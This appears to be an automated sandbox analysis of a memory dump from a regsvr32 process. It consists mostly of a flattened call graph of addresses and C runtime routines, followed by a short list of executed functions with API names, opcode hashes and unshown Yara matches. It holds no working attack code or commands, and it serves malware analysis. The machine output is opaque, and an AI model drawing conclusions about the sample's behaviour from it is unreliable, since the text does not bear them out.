ExitProcess 8142->8145 8143->8142 8146 24f606d 8145->8146 8147->8137 8147->8139 8148 24f1468 ExitProcess Is_bad_exception_allowed 8147->8148 8149 24f147c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8147->8149 8148->8147 8149->8147 8463 24f8580 8464 24f85b8 8463->8464 8465 24f85e4 8464->8465 8467 24f1550 8464->8467 8468 24ee560 _CreateFrameInfo ExitProcess 8467->8468 8469 24f157a 8468->8469 8470 24ee560 _CreateFrameInfo ExitProcess 8469->8470 8471 24f1587 8470->8471 8472 24ee560 _CreateFrameInfo ExitProcess 8471->8472 8473 24f1590 8472->8473 8474 24f6608 __GSHandlerCheck_EH 2 API calls 8473->8474 8475 24f15c1 8474->8475 8475->8465 8454 24ecdd8 8455 24ee300 __GSHandlerCheck_EH ExitProcess 8454->8455 8456 24ecde1 8455->8456 8318 24f0a98 8319 24f0aa6 8318->8319 8320 24eed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8319->8320 8321 24f0a5f 8319->8321 8320->8321 8476 24f3798 8478 24f37ad 8476->8478 8477 24f37c0 8478->8477 8479 24ee560 _CreateFrameInfo ExitProcess 8478->8479 8480 24f37d0 8479->8480 8481 24ee560 _CreateFrameInfo ExitProcess 8480->8481 8482 24f37d9 8481->8482 8483 24ee300 __GSHandlerCheck_EH ExitProcess 8482->8483 8484 24f37e2 8483->8484 7562 24ec1d4 7581 24ec4a8 7562->7581 7565 24ec233 7567 24ec1e8 __FrameHandler3::FrameUnwindToEmptyState __scrt_get_show_window_mode __scrt_acquire_startup_lock __scrt_release_startup_lock 7567->7562 7567->7565 7571 24ec2e5 7567->7571 7575 24b9a30 7567->7575 7585 24ed198 7567->7585 7590 24edd48 7567->7590 7604 24ed160 7567->7604 7609 24ed16c 7567->7609 7572 24ec2ef 7571->7572 7595 24ed178 7571->7595 7600 24ec4e4 7572->7600 7576 24b9a49 CreateThread 7575->7576 7580 24b9a87 __scrt_get_show_window_mode 7576->7580 7614 24bbdb0 7576->7614 7578 24ba200 __std_exception_destroy __scrt_get_show_window_mode 7578->7567 7578->7578 7579 24b9e10 GetLocaleInfoA 7579->7580 7580->7578 7580->7579 7582 24ec4b0 7581->7582 7583 24ec4bc __scrt_dllmain_crt_thread_attach 7582->7583 7584 24ec4c5 7583->7584 7584->7567 7586 24ed1af 7585->7586 7587 24ed1d0 7585->7587 7586->7567 7618 24ee300 7587->7618 7666 24ef678 7590->7666 7592 24edd57 7594 24edd9d 7592->7594 7672 24f30cc 7592->7672 7594->7567 7596 24ed2a8 __FrameHandler3::FrameUnwindToEmptyState 7595->7596 7597 24ed35a 7596->7597 7767 24ed274 7596->7767 7597->7572 7599 24ed36c 7601 24ec4f5 7600->7601 7602 24ec4fe 7601->7602 7771 24ed094 7601->7771 7602->7565 7605 24ed2a8 __FrameHandler3::FrameUnwindToEmptyState 7604->7605 7606 24ed35a 7605->7606 7607 24ed274 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7605->7607 7606->7567 7608 24ed36c 7607->7608 7611 24ed2a8 __FrameHandler3::FrameUnwindToEmptyState 7609->7611 7610 24ed35a 7610->7567 7611->7610 7612 24ed274 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7611->7612 7613 24ed36c 7612->7613 7616 24bc56d 7614->7616 7615 24bc833 MessageBoxA 7615->7616 7617 24bce27 7615->7617 7616->7615 7616->7617 7623 24eed44 7618->7623 7624 24eed59 _set_fmode __free_lconv_num 7623->7624 7625 24ee309 7624->7625 7626 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7624->7626 7628 24ee49c 7625->7628 7627 24eee16 7626->7627 7629 24ee4a5 __FrameHandler3::FrameUnwindToEmptyState 7628->7629 7633 24ee4b4 __FrameHandler3::FrameUnwindToEmptyState 7629->7633 7634 24f0868 7629->7634 7631 24ed16c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7632 24ee4f1 7631->7632 7633->7631 7636 24f08bf Concurrency::details::SchedulerProxy::DeleteThis 7634->7636 7637 24f0898 _set_fmode 7634->7637 7635 24f08fc 7635->7633 7638 24f0ac8 Concurrency::details::SchedulerProxy::DeleteThis 7636->7638 7642 24f09c2 7636->7642 7643 24f09fb Concurrency::details::SchedulerProxy::DeleteThis 7636->7643 7637->7635 7637->7636 7639 24f0941 _set_fmode 7637->7639 7640 24ed16c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7638->7640 7652 24f0344 7639->7652 7641 24f0adf 7640->7641 7642->7643 7645 24eed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7642->7645 7646 24eed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7643->7646 7649 24f0a70 7643->7649 7651 24f0a5f 7643->7651 7647 24f09eb 7645->7647 7646->7649 7648 24eed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7647->7648 7648->7643 7650 24eed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7649->7650 7649->7651 7650->7651 7651->7633 7655 24f06fc 7652->7655 7656 24f0727 _invalid_parameter_noinfo 7655->7656 7657 24f0771 7656->7657 7661 24f05dc 7656->7661 7659 24f035d 7657->7659 7660 24f05dc _invalid_parameter_noinfo ExitProcess 7657->7660 7659->7635 7660->7659 7662 24f062f 7661->7662 7663 24f05ef _invalid_parameter_noinfo 7661->7663 7662->7657 7663->7662 7664 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7663->7664 7665 24f0642 7664->7665 7667 24ef685 7666->7667 7668 24ef6ca 7666->7668 7676 24eee18 7667->7676 7668->7592 7670 24ef6b4 7681 24efc04 7670->7681 7673 24f30e0 7672->7673 7674 24ef6d8 ExitProcess 7673->7674 7675 24f3104 7674->7675 7675->7592 7678 24eee29 _set_fmode __free_lconv_num 7676->7678 7677 24eee3c _set_fmode __free_lconv_num 7677->7670 7678->7677 7679 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7678->7679 7680 24eeeb9 7679->7680 7690 24efb4c 7681->7690 7683 24efc39 7703 24efa34 7683->7703 7685 24efc40 7688 24efc56 _set_fmode __free_lconv_num 7685->7688 7706 24ef774 7685->7706 7687 24efd71 __free_lconv_num 7687->7688 7711 24f005c 7687->7711 7688->7668 7694 24efb6f Concurrency::details::SchedulerProxy::DeleteThis __free_lconv_num 7690->7694 7691 24efbeb 7691->7683 7692 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7693 24efc03 7692->7693 7695 24efb4c ExitProcess 7693->7695 7694->7691 7694->7692 7696 24efc39 7695->7696 7697 24efa34 ExitProcess 7696->7697 7699 24efc40 7697->7699 7698 24efc56 _set_fmode __free_lconv_num 7698->7683 7699->7698 7700 24ef774 ExitProcess 7699->7700 7701 24efd71 __free_lconv_num 7700->7701 7701->7698 7702 24f005c ExitProcess 7701->7702 7702->7698 7717 24ef6d8 7703->7717 7707 24efa34 ExitProcess 7706->7707 7710 24ef7a1 __scrt_get_show_window_mode 7707->7710 7708 24ef8f7 _log10_special 7708->7687 7710->7708 7753 24efe74 7710->7753 7712 24f0078 _set_fmode Concurrency::details::SchedulerProxy::DeleteThis __scrt_get_show_window_mode 7711->7712 7713 24f0344 _invalid_parameter_noinfo ExitProcess 7712->7713 7714 24f00a5 _set_fmode __scrt_get_show_window_mode 7712->7714 7713->7714 7715 24f0344 _invalid_parameter_noinfo ExitProcess 7714->7715 7716 24f0157 Concurrency::details::SchedulerProxy::DeleteThis __free_lconv_num 7714->7716 7715->7716 7716->7688 7718 24ef6fc 7717->7718 7724 24ef6f7 7717->7724 7719 24eed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7718->7719 7718->7724 7720 24ef717 7719->7720 7725 24f4e18 7720->7725 7724->7685 7726 24f4e2d 7725->7726 7727 24ef73a 7725->7727 7726->7727 7733 24f22c8 7726->7733 7729 24f4e4c 7727->7729 7730 24f4e74 7729->7730 7731 24f4e61 7729->7731 7730->7724 7731->7730 7739 24ef65c 7731->7739 7734 24eed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7733->7734 7736 24f22d7 Concurrency::details::SchedulerProxy::DeleteThis 7734->7736 7735 24f2322 7735->7727 7736->7735 7737 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7736->7737 7738 24f2335 7737->7738 7740 24eed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7739->7740 7741 24ef665 Concurrency::details::SchedulerProxy::DeleteThis __free_lconv_num 7740->7741 7742 24efbeb 7741->7742 7743 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7741->7743 7742->7730 7744 24efc03 7743->7744 7745 24efb4c ExitProcess 7744->7745 7746 24efc39 7745->7746 7747 24efa34 ExitProcess 7746->7747 7748 24efc40 7747->7748 7749 24ef774 ExitProcess 7748->7749 7751 24efc56 _set_fmode __free_lconv_num 7748->7751 7750 24efd71 __free_lconv_num 7749->7750 7750->7751 7752 24f005c ExitProcess 7750->7752 7751->7730 7752->7751 7754 24efeb1 7753->7754 7760 24effa7 _log10_special 7753->7760 7754->7760 7761 24f1d74 7754->7761 7756 24eff3b 7764 24f4a4c 7756->7764 7758 24eff6e 7759 24f4a4c ExitProcess 7758->7759 7759->7760 7760->7708 7762 24ef6d8 ExitProcess 7761->7762 7763 24f1db6 _log10_special __scrt_get_show_window_mode __free_lconv_num 7762->7763 7763->7756 7765 24ef6d8 ExitProcess 7764->7765 7766 24f4a71 7765->7766 7766->7758 7768 24ed281 __FrameHandler3::FrameUnwindToEmptyState 7767->7768 7769 24ed29d ExitProcess 7768->7769 7770 24ed2a8 __FrameHandler3::FrameUnwindToEmptyState 7769->7770 7770->7599 7772 24ed09c 7771->7772 7775 24ed0b2 7771->7775 7773 24ed0ab 7772->7773 7776 24f0b2c 7772->7776 7773->7602 7775->7602 7777 24f0c94 7776->7777 7779 24f0d90 7777->7779 7781 24f0daf Concurrency::details::SchedulerProxy::DeleteThis 7779->7781 7780 24f0e59 Concurrency::details::SchedulerProxy::DeleteThis 7781->7780 7783 24f0cf4 7781->7783 7784 24f0d11 7783->7784 7786 24f0d41 7784->7786 7787 24f0b34 7784->7787 7786->7781 7788 24f0b67 7787->7788 7789 24f0b7c 7788->7789 7790 24f0b87 7788->7790 7802 24f0c94 7789->7802 7804 24f0c08 7790->7804 7793 24f0b90 7796 24f0b83 7793->7796 7808 24f5028 7793->7808 7795 24f0bdc 7797 24f0bf1 7795->7797 7800 24f05dc _invalid_parameter_noinfo ExitProcess 7795->7800 7796->7795 7799 24f05dc _invalid_parameter_noinfo ExitProcess 7796->7799 7797->7786 7799->7795 7800->7797 7803 24f0d90 ExitProcess 7802->7803 7805 24f0c2e 7804->7805 7807 24f0c4f 7804->7807 7806 24f5028 ExitProcess 7805->7806 7805->7807 7806->7807 7807->7793 7809 24f0bac 7808->7809 7810 24f5031 _set_fmode 7808->7810 7812 24f4f08 7809->7812 7811 24f0344 _invalid_parameter_noinfo ExitProcess 7810->7811 7811->7809 7813 24f4f25 7812->7813 7815 24f4f18 _set_fmode 7812->7815 7814 24f4f81 _set_fmode 7813->7814 7816 24f4f54 7813->7816 7818 24f0344 _invalid_parameter_noinfo ExitProcess 7814->7818 7815->7796 7819 24f4f9c 7816->7819 7818->7815 7820 24f4fb8 7819->7820 7822 24f4fe7 _set_fmode 7820->7822 7823 24f33dc 7820->7823 7822->7815 7824 24f33fa _set_fmode 7823->7824 7825 24f33e5 _set_fmode 7823->7825 7824->7825 7826 24f0344 _invalid_parameter_noinfo ExitProcess 7824->7826 7825->7822 7826->7825 8427 24f6310 8430 24f8840 8427->8430 8429 24f6339 8431 24f8861 8430->8431 8432 24f8896 __std_exception_destroy 8430->8432 8431->8432 8433 24ee688 __std_exception_copy ExitProcess 8431->8433 8432->8429 8433->8432 8434 24fab2c 8437 24ece64 8434->8437 8438 24ece8e 8437->8438 8439 24ece7c 8437->8439 8441 24ee560 _CreateFrameInfo ExitProcess 8438->8441 8439->8438 8440 24ece84 8439->8440 8443 24ece8c 8440->8443 8444 24ee560 _CreateFrameInfo ExitProcess 8440->8444 8442 24ece93 8441->8442 8442->8443 8446 24ee560 _CreateFrameInfo ExitProcess 8442->8446 8445 24eceb3 8444->8445 8447 24ee560 _CreateFrameInfo ExitProcess 8445->8447 8446->8443 8448 24ecec0 8447->8448 8449 24ee300 __GSHandlerCheck_EH ExitProcess 8448->8449 8450 24ecec9 8449->8450 8485 24f0fac 8486 24f0b2c ExitProcess 8485->8486 8487 24f0fb7 8486->8487 8490 24f5c80 8487->8490 8489 24f0fbc __free_lconv_num 8493 24f5c99 Concurrency::details::SchedulerProxy::DeleteThis __free_lconv_num 8490->8493 8491 24f5d19 Concurrency::details::SchedulerProxy::DeleteThis 8491->8489 8493->8491 8494 24f8600 8493->8494 8495 24f8630 8494->8495 8502 24f8740 8495->8502 8497 24f8649 8498 24f866e 8497->8498 8499 24f05dc _invalid_parameter_noinfo ExitProcess 8497->8499 8500 24f05dc _invalid_parameter_noinfo ExitProcess 8498->8500 8501 24f8683 8498->8501 8499->8498 8500->8501 8501->8493 8503 24f8789 8502->8503 8505 24f875b _invalid_parameter_noinfo 8502->8505 8503->8505 8506 24f8698 8503->8506 8505->8497 8507 24f86d8 8506->8507 8509 24f86b3 _invalid_parameter_noinfo __free_lconv_num 8506->8509 8508 24f0c08 ExitProcess 8507->8508 8507->8509 8510 24f86eb 8508->8510 8509->8505 8511 24f5028 ExitProcess 8510->8511 8512 24f86fd 8511->8512 8514 24f8d7c 8512->8514 8515 24f8da8 8514->8515 8517 24f8d90 _invalid_parameter_noinfo 8514->8517 8515->8517 8518 24f8e40 8515->8518 8517->8509 8519 24f8e5c 8518->8519 8521 24f8e91 8519->8521 8522 24f8cac 8519->8522 8521->8517 8523 24f33dc ExitProcess 8522->8523 8525 24f8cc8 8523->8525 8524 24f8d0b 8527 24f33dc ExitProcess 8524->8527 8530 24f8cce 8524->8530 8525->8524 8526 24f33dc ExitProcess 8525->8526 8525->8530 8528 24f8cfe 8526->8528 8527->8530 8529 24f33dc ExitProcess 8528->8529 8529->8524 8530->8521 8322 24f2aaa 8323 24f2ab3 8322->8323 8325 24f2ac5 __free_lconv_num 8322->8325 8324 24f3154 ExitProcess 8323->8324 8324->8325 8326 24f82a8 8327 24f82b0 8326->8327 8328 24f33dc ExitProcess 8327->8328 8329 24f82d7 8328->8329 8330 24faaa6 8331 24f14fc __CxxCallCatchBlock ExitProcess 8330->8331 8332 24faab9 8331->8332 8337 24ecde8 __CxxCallCatchBlock ExitProcess 8332->8337 8338 24faaf8 __CxxCallCatchBlock 8332->8338 8333 24ee560 _CreateFrameInfo ExitProcess 8334 24fab0c 8333->8334 8335 24ee560 _CreateFrameInfo ExitProcess 8334->8335 8336 24fab1c 8335->8336 8337->8338 8338->8333 8531 24fa7a6 8532 24fa829 8531->8532 8533 24fa7be 8531->8533 8533->8532 8534 24ee560 _CreateFrameInfo ExitProcess 8533->8534 8535 24fa80b 8534->8535 8536 24ee560 _CreateFrameInfo ExitProcess 8535->8536 8537 24fa820 8536->8537 8538 24ee300 __GSHandlerCheck_EH ExitProcess 8537->8538 8538->8532 8153 24ec2ff 8156 24ed188 8153->8156 8157 24ed2a8 __FrameHandler3::FrameUnwindToEmptyState 8156->8157 8158 24ec313 8157->8158 8159 24ed274 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8157->8159 8160 24ed36c 8159->8160 8539 24ef3bc 8540 24ef3cc Concurrency::details::SchedulerProxy::DeleteThis 8539->8540 8545 24f3608 8540->8545 8542 24ef3d5 8544 24ef3de Concurrency::details::SchedulerProxy::DeleteThis 8542->8544 8549 24ef438 8542->8549 8546 24f3627 _set_fmode 8545->8546 8547 24f3638 Concurrency::details::SchedulerProxy::DeleteThis 8545->8547 8548 24f0344 _invalid_parameter_noinfo ExitProcess 8546->8548 8547->8542 8548->8547 8550 24ef45e 8549->8550 8551 24f3608 ExitProcess 8550->8551 8552 24ef496 8550->8552 8551->8552 8552->8544 8457 24eddfd 8458 24ede04 8457->8458 8459 24ef678 ExitProcess 8458->8459 8460 24ede19 __free_lconv_num 8458->8460 8461 24ede22 8459->8461 8461->8460 8462 24edf38 ExitProcess 8461->8462 8462->8460 7827 24faa79 7830 24f640c 7827->7830 7831 24f6473 7830->7831 7832 24f6426 7830->7832 7832->7831 7834 24ee560 7832->7834 7835 24ee569 _CreateFrameInfo 7834->7835 7836 24ee56e 7835->7836 7837 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7835->7837 7836->7831 7838 24ee578 7837->7838 8359 24fa979 8360 24ee560 _CreateFrameInfo ExitProcess 8359->8360 8361 24fa993 8360->8361 8362 24ee560 _CreateFrameInfo ExitProcess 8361->8362 8363 24fa9ae 8362->8363 8364 24ee560 _CreateFrameInfo ExitProcess 8363->8364 8365 24fa9c2 8364->8365 8370 24f6608 8365->8370 8368 24ee560 _CreateFrameInfo ExitProcess 8369 24faa04 8368->8369 8371 24f6a10 __except_validate_context_record 8370->8371 8372 24ee560 _CreateFrameInfo ExitProcess 8371->8372 8373 24f6a42 8372->8373 8375 24f6b2a 8373->8375 8377 24f6a9c 8373->8377 8391 24f6af0 8373->8391 8374 24f6b98 8376 24f6c48 __GSHandlerCheck_EH ExitProcess 8374->8376 8374->8391 8379 24f1468 Is_bad_exception_allowed ExitProcess 8375->8379 8385 24f6b49 8375->8385 8376->8391 8378 24f6b17 8377->8378 8380 24f6abe 8377->8380 8381 24f6af5 8377->8381 8377->8391 8382 24f10fc __FrameHandler3::FrameUnwindToEmptyState 2 API calls 8378->8382 8379->8385 8383 24f5de0 __GSHandlerCheck_EH ExitProcess 8380->8383 8381->8378 8384 24f6acd 8381->8384 8382->8391 8383->8384 8386 24f6c41 8384->8386 8389 24f6adf 8384->8389 8385->8374 8387 24f1494 __GSHandlerCheck_EH ExitProcess 8385->8387 8385->8391 8388 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8386->8388 8387->8374 8390 24f6c46 8388->8390 8392 24f5ee4 __FrameHandler3::FrameUnwindToEmptyState 2 API calls 8389->8392 8391->8368 8392->8391 8553 24ec1b8 8554 24ec1c1 _set_fmode 8553->8554 8555 24f0344 _invalid_parameter_noinfo ExitProcess 8554->8555 8556 24ee2c9 8554->8556 8555->8556 7839 24f5478 7840 24f54fd 7839->7840 7844 24f5514 __GSHandlerCheck_EH 7840->7844 7845 24f3ae0 7840->7845 7842 24f7ef8 ExitProcess 7842->7844 7843 24f5840 _log10_special 7844->7842 7844->7843 7846 24f05dc _invalid_parameter_noinfo ExitProcess 7845->7846 7847 24f3af7 7846->7847 7852 24f4e80 7847->7852 7853 24f4e99 7852->7853 7855 24f3b1f 7852->7855 7854 24f22c8 ExitProcess 7853->7854 7853->7855 7854->7855 7856 24f4eb8 7855->7856 7857 24f3b2f 7856->7857 7858 24f4ed1 7856->7858 7857->7844 7858->7857 7859 24ef65c ExitProcess 7858->7859 7859->7857 8393 24f5d78 8394 24f5d81 _set_fmode 8393->8394 8395 24f5d8e _set_fmode 8393->8395 8395->8394 8396 24f0344 _invalid_parameter_noinfo ExitProcess 8395->8396 8396->8394 8339 24ec8b4 8340 24ec8cc 8339->8340 8341 24ec8e8 8339->8341 8340->8341 8348 24ece18 8340->8348 8346 24ee300 __GSHandlerCheck_EH ExitProcess 8347 24ec90e 8346->8347 8349 24ee560 _CreateFrameInfo ExitProcess 8348->8349 8350 24ec8fa 8349->8350 8351 24ece2c 8350->8351 8352 24ee560 _CreateFrameInfo ExitProcess 8351->8352 8353 24ec906 8352->8353 8353->8346 8161 24ec0f0 8162 24ec100 8161->8162 8173 24ee268 8162->8173 8164 24ec10c _RTC_Initialize 8167 24ec187 8164->8167 8177 24ec35c 8164->8177 8166 24ec139 8180 24ed58c 8166->8180 8169 24ec145 8169->8167 8195 24ed480 8169->8195 8171 24ec179 8171->8167 8200 24eddb8 8171->8200 8174 24ee279 _set_fmode 8173->8174 8175 24ee281 8174->8175 8176 24f0344 _invalid_parameter_noinfo ExitProcess 8174->8176 8175->8164 8176->8175 8206 24ec374 8177->8206 8179 24ec365 8179->8166 8181 24ed5ac 8180->8181 8192 24ed5c3 _set_fmode __free_lconv_num 8180->8192 8182 24ed5ca 8181->8182 8183 24ed5b4 _set_fmode 8181->8183 8184 24ef678 ExitProcess 8182->8184 8186 24f0344 _invalid_parameter_noinfo ExitProcess 8183->8186 8185 24ed5cf 8184->8185 8232 24f2e8c 8185->8232 8186->8192 8188 24ed5e6 8236 24ed774 8188->8236 8190 24ed623 8191 24ed774 ExitProcess 8190->8191 8190->8192 8193 24ed675 8191->8193 8192->8169 8193->8192 8242 24f2450 8193->8242 8196 24eed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8195->8196 8198 24ed48d _set_fmode 8196->8198 8197 24ed4c1 8197->8171 8198->8197 8199 24f0344 _invalid_parameter_noinfo ExitProcess 8198->8199 8199->8197 8201 24ede04 8200->8201 8202 24ef678 ExitProcess 8201->8202 8205 24ede19 __free_lconv_num 8201->8205 8203 24ede22 8202->8203 8203->8205 8307 24edf38 8203->8307 8205->8167 8207 24ec38e 8206->8207 8209 24ec387 8206->8209 8210 24ed964 8207->8210 8209->8179 8213 24edcd0 8210->8213 8212 24ed9a6 8212->8209 8214 24edcec Concurrency::details::SchedulerProxy::DeleteThis 8213->8214 8217 24eda00 8214->8217 8216 24edcf5 Concurrency::details::SchedulerProxy::DeleteThis 8216->8212 8218 24eda2c 8217->8218 8222 24edab7 __free_lconv_num 8217->8222 8221 24eda93 __free_lconv_num 8218->8221 8218->8222 8223 24f3154 8218->8223 8219 24f3154 ExitProcess 8219->8222 8221->8219 8221->8222 8222->8216 8224 24f3176 8223->8224 8226 24f3184 _set_fmode __scrt_get_show_window_mode 8224->8226 8227 24f7eb4 8224->8227 8226->8221 8228 24f7ebd _set_fmode 8227->8228 8229 24f7ed6 8227->8229 8230 24f0344 _invalid_parameter_noinfo ExitProcess 8228->8230 8231 24f7ecd 8230->8231 8231->8226 8233 24f2ecd 8232->8233 8234 24ef6d8 ExitProcess 8233->8234 8235 24f2ed1 _log10_special 8233->8235 8234->8235 8235->8188 8238 24ed7b2 8236->8238 8237 24f30cc ExitProcess 8237->8238 8238->8237 8240 24ed81e 8238->8240 8239 24ed90f 8239->8190 8240->8239 8241 24f30cc ExitProcess 8240->8241 8241->8240 8243 24f2458 8242->8243 8244 24f247d _set_fmode 8243->8244 8246 24f2494 8243->8246 8245 24f0344 _invalid_parameter_noinfo ExitProcess 8244->8245 8251 24f248d _invalid_parameter_noinfo __free_lconv_num 8245->8251 8247 24f254c 8246->8247 8246->8251 8252 24f29a4 8246->8252 8275 24f2b28 8246->8275 8247->8251 8292 24f78c0 8247->8292 8251->8192 8254 24f29d2 _set_fmode 8252->8254 8253 24f29ee 8253->8246 8254->8253 8255 24f2a36 8254->8255 8256 24f78c0 ExitProcess 8254->8256 8257 24f78c0 ExitProcess 8255->8257 8261 24f2a53 _invalid_parameter_noinfo 8255->8261 8256->8255 8257->8261 8258 24f2a5b _set_fmode __free_lconv_num 8258->8246 8259 24f2b8a 8260 24f2bb1 8259->8260 8263 24f2b9c 8259->8263 8265 24ef6d8 ExitProcess 8260->8265 8261->8258 8261->8259 8296 24f7e18 8261->8296 8264 24f29a4 ExitProcess 8263->8264 8271 24f2bac _log10_special __free_lconv_num 8264->8271 8266 24f2c0a 8265->8266 8267 24f2ca7 8266->8267 8272 24f2cd1 __free_lconv_num 8266->8272 8268 24f29a4 ExitProcess 8267->8268 8268->8271 8269 24ef6d8 ExitProcess 8269->8272 8270 24f29a4 ExitProcess 8270->8272 8271->8246 8272->8269 8272->8270 8272->8271 8273 24f2ddf 8272->8273 8273->8271 8303 24f74b0 8273->8303 8276 24f2b8a 8275->8276 8277 24f2b68 8275->8277 8278 24f2bb1 8276->8278 8280 24f2b9c 8276->8280 8277->8276 8279 24f7e18 ExitProcess 8277->8279 8282 24ef6d8 ExitProcess 8278->8282 8279->8277 8281 24f29a4 ExitProcess 8280->8281 8288 24f2bac _log10_special __free_lconv_num 8281->8288 8283 24f2c0a 8282->8283 8284 24f2ca7 8283->8284 8289 24f2cd1 __free_lconv_num 8283->8289 8285 24f29a4 ExitProcess 8284->8285 8285->8288 8286 24ef6d8 ExitProcess 8286->8289 8287 24f29a4 ExitProcess 8287->8289 8288->8246 8289->8286 8289->8287 8289->8288 8290 24f2ddf 8289->8290 8290->8288 8291 24f74b0 ExitProcess 8290->8291 8291->8288 8295 24f78dd _set_fmode 8292->8295 8293 24f0344 _invalid_parameter_noinfo ExitProcess 8294 24f78f8 8293->8294 8294->8247 8295->8293 8295->8294 8297 24f7e20 8296->8297 8298 24f7e35 _set_fmode 8297->8298 8299 24f7e4e 8297->8299 8300 24f0344 _invalid_parameter_noinfo ExitProcess 8298->8300 8301 24ef6d8 ExitProcess 8299->8301 8302 24f7e45 8299->8302 8300->8302 8301->8302 8302->8261 8304 24f74dd _set_fmode 8303->8304 8305 24f0344 _invalid_parameter_noinfo ExitProcess 8304->8305 8306 24f74f2 _log10_special 8304->8306 8305->8306 8306->8271 8308 24edf5d _set_fmode __free_lconv_num 8307->8308 8310 24edf9b _invalid_parameter_noinfo __free_lconv_num 8308->8310 8311 24ee688 8308->8311 8310->8205 8312 24ee695 _set_fmode 8311->8312 8313 24ee6b2 8312->8313 8314 24f0344 _invalid_parameter_noinfo ExitProcess 8312->8314 8313->8308 8314->8313

                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                  Function 024B9A30 Relevance: 9.0, APIs: 2, Strings: 1, Instructions: 3726threadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateInfoLocaleThread
                                                                                                                                                                                                                                                                                                  • String ID: 5
                                                                                                                                                                                                                                                                                                  • API String ID: 899703944-2226203566
                                                                                                                                                                                                                                                                                                  • Opcode ID: ac61b2cba66e79233cc380a49c31ec76b5bea808db43e292b3db5bd03ea4f0b3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 07de5a95b22e99ddf12f0ac8f23b6b991b9615b00c88138f4ca53e6b699895cf
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac61b2cba66e79233cc380a49c31ec76b5bea808db43e292b3db5bd03ea4f0b3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F13D46BBA55140BBB0C887A99A33E773C7D3E6719E29F13D89C3C3543DCAA480B0585
                                                                                                                                                                                                                                                                                                  Function 024BBDB0 Relevance: 3.2, APIs: 1, Instructions: 1733windowCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 85 24bbdb0-24bc567 86 24bc56d-24bc572 85->86 87 24bc790-24bc827 85->87 86->87 88 24bc578-24bc78e 86->88 89 24bc829-24bc82d 87->89 90 24bc833-24bcdfe MessageBoxA 87->90 88->87 89->90 91 24bce0a-24bce22 89->91 92 24bce00-24bce08 90->92 93 24bce27-24bce37 90->93 91->90 92->91 92->93
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2030045667-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 60d6a659b960b3717680036fba42c66b31b789c7868b512b370437a3548f9c93
                                                                                                                                                                                                                                                                                                  • Instruction ID: 450f7ebb50b326cb22564a607e9951eb97fa944abc5045b1463df25a7ac55797
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60d6a659b960b3717680036fba42c66b31b789c7868b512b370437a3548f9c93
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE92B46BBF55000BAB0C88B699A73F363C7D3A6719F29B43D45D7C3152ECAE884B0585
                                                                                                                                                                                                                                                                                                  Function 024ED274 Relevance: 1.6, APIs: 1, Instructions: 93COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
